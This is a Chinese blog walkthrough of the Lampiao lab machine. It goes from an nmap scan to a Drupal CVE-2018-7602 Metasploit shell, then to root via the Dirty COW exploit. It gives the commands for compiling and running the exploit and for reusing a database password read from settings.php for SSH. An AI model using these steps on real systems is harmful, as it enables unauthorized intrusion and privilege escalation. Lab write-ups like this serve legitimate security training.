【linux提权】一次Drupal的脏牛提权

已于 2023-08-14 16:58:07 修改
阅读量319 收藏 1
点赞数 2
文章标签: linux 服务器 网络
于 2023-08-14 16:56:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65544268/article/details/132279381
版权

环境搭建

靶机:Lampiao靶场 Ubuntu系统

攻击主机:Kali Linux

IP:172.16.100.136

漏洞复现

一、信息收集

1.首先我们需要对网段 172.16.100.0/24进行扫描扫描0-2000端口

nmap -p 0-2000 172.16.100.0/24

扫描结果
在这里插入图片描述

2.尝试访问80端口,得到如下测试页
请添加图片描述

3.继续尝试访问1898端口,得到如下界面

请添加图片描述

同时还发现了Drupal CMF内容管理框架,之后我们对网站进行目录扫描爆破

请添加图片描述

能够拿到robots.txt文件,同时我们还发现了CHANGELOG.txt文件

4.尝试访问CHANGELOG.txt文件
请添加图片描述

请添加图片描述

5.通过文件的第一行我们可以看出Drupal的版本号为7.54,尝试信息收集它的相关历史漏洞。

Drupal CVE-2018-7602 远程命令执行漏洞

请添加图片描述

二、漏洞利用

1.尝试拿到靶机的shell,使用msf,搜索Drupal相关漏洞

msfconsole
search Drupal

请添加图片描述

2.尝试使用2018年的这个漏洞

use 1

3.设置监听目标地址,目标端口,运行

set rhost 172.16.100.138
set rport 1898
run

请添加图片描述

三、权限提升

1)脏牛提权(CVE-2016-5195)

1.上传一个漏洞检测脚本到靶机的tmp下
请添加图片描述

2.进入完整交互shell

-c选项:执行python代码

python -c 'import pty; pty.spawn("/bin/bash")'

请添加图片描述

3.给脚本提权

chmod +777 linux-exploit-suggester.sh

4.执行脚本

./linux-exploit-suggester.sh

请添加图片描述

这里给出来的不太好用,我们可以去github找CVE-2016-5195相关的exp来利用,将下载的exp传入靶机

下载链接:https://www.exploit-db.com/download/40847

请添加图片描述

5.进入shell进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o cowcow 40847.cpp -lutil

1.-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2.-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3.-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4.-std=c++11就是用按C++2011标准来编译的
5.-pthread 在Linux中要用到多线程时,需要链接pthread库
6.-o dcow gcc生成的目标文件,名字为cowcow
请添加图片描述

6.运行cowcow,可以得到root用户的密码

请添加图片描述

7.尝试登录
请添加图片描述

成功提权。

2)可以利用ssh登录来进行脏牛提权

1.寻找靶的数据库账号和密码

pwd
cat sites/default/settings.php

请添加图片描述

收集到以下信息

数据库:drupal

账号:drupaluser

密码:Virgulino

2.查看用户名

ls /home

请添加图片描述

用户名为tiago

3.尝试登录ssh

使用用户名:tiago 数据库密码:Virgulino 进行ssh登录

ssh tiago@172.16.100.138

请添加图片描述

接下来的步骤同1)

LVzuiSuai
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackthebox-bastard (考点drupal&Windows版本提权
冬萍子癸水
04-08 499
nmap 80端口看看网页 是drupal 这是个典型考点,如果这个版本有漏洞的话DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)。没有就不行了,比如参考htb另一台靶机hawk,只能找到账号密码登录才行。 先可以用https://github.com/dreadlocked/Drupalgeddon2 ruby drupalge...
〖EXP〗Drupal远程代码执行漏洞复现&Ladon批量利用
K8哥哥
08-03 1042
漏洞简介 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞分析 https://research.checkpoint.com/uncovering-drupalgeddon-2/ 影响版
Drupal远程代码执行(CVE-2018-7602)与其Poc分析
Zlirving_的博客
06-24 1829
漏洞概述 这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。攻击者可以通过不同方式利用该漏洞远程执行代码。CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。所以,一旦参数可控并且没有经过正确的过滤,就很有可能出问题。   漏洞影响 ①对URL中的#进行编码两次,绕过sanitize()函数过滤 ②任意命令执行 ③… 影响版本 Drupal 7.x,8.x 修复版本 Drupal 7.59,Drupal 8.5.3,Drupal 8
VulnHub — Lampiao
qq_61768489的博客
09-09 1687
信息收集 msfconsole 提权
渗透项目(二):Lampiao
Ays.Ie的博客
10-16 1158
2022.10.16更新第二个渗透项目Lampiao,步骤很详细,继续努力!
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2046
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
第63天:权限提升-Linux内核漏洞&SUID&信息收集1
08-03
**案例4:Linux提权内核漏洞演示** (Dirty COW)是Linux内核中的一个严重漏洞,允许攻击者以非特权用户身份修改任意读取-only内存映射文件。利用此漏洞,攻击者可以获取root权限。这个过程包括使用工具如...
Drupal7 form表单二次开发要点与实例
10-26
主要介绍了Drupal7 form表单二次开发要点与实例,解决了经常使用的Form表单提交后跳转问题,需要的朋友可以参考下
66.Vulnhub靶机渗透之DC-1提权Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
csdn 所有关于drupal一次性下载
11-24
csdn 所有关于drupal一次性下载
Drupal 7.54 英文版.zip
05-25
Drupal是一个开源的内容管理系统(CMS)平台,它是用PHP写成的。Drupal有一个优秀的模块化结构,提供了许多模块,包括短消息、个性化书签、网站管理、Blog、日记、电子商务、电子出版、留言簿、Job、网上电影院、论坛、投票等模块。并且Drupal模块的下载、安装、定制非常方便。Drupal 7.54 英文版 更新日志:2017-02-01模块现在可以定义主题引擎;添加菜单树渲染结构到(pre)进程钩子为theme_menu_tree();添加了一个新的drupal_is_https()API函数;搜索记录现在可以被禁用(管理界面中的新选项;日期类型配置页面上的短和中日期格式的默认值现在是正确的;文件验证错误消息现在在后续上传有效文件后被删除。
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 4336
CVE-2018-7600漏洞学习与复现
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
Drupal 远程代码执行漏洞(CVE-2018-7602)
黑白的博客
12-28 3007
声明 好好学习,天天向上 漏洞描述 4月25日,Drupal官方发布通告,Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本。据分析,这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的,通告还称,已经发现了这个漏洞和CVE-2018-7600的在野利用 影响范围 Drupal 6.x,7.x,8.x 复现过程 这里使用7.57版本 使用vulhub /app/vulhub-master/drupal/CVE-2018-7602 使用docker启动 dock
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
weixin_33759269的博客
11-25 1070
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。   0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1...
Linux】进程间通信——匿名管道
2201_76024104的博客
07-08 1137
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
Linux C | 管道open打开方式
最新发布
I_feige的博客
07-12 196
1.
建立共享linux第三方软件仓库
Znj1421304181的博客
07-08 205
【代码】建立共享linux第三方软件仓库。
Linux安装drupal
10-20
安装Drupal需要先完成LAMP的搭建,如果没有安装可以参照之前提供的文章或者使用tasksel安装。接下来,按照以下步骤安装Drupal: 1. 下载Drupal:使用wget命令下载Drupal,例如:wget ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值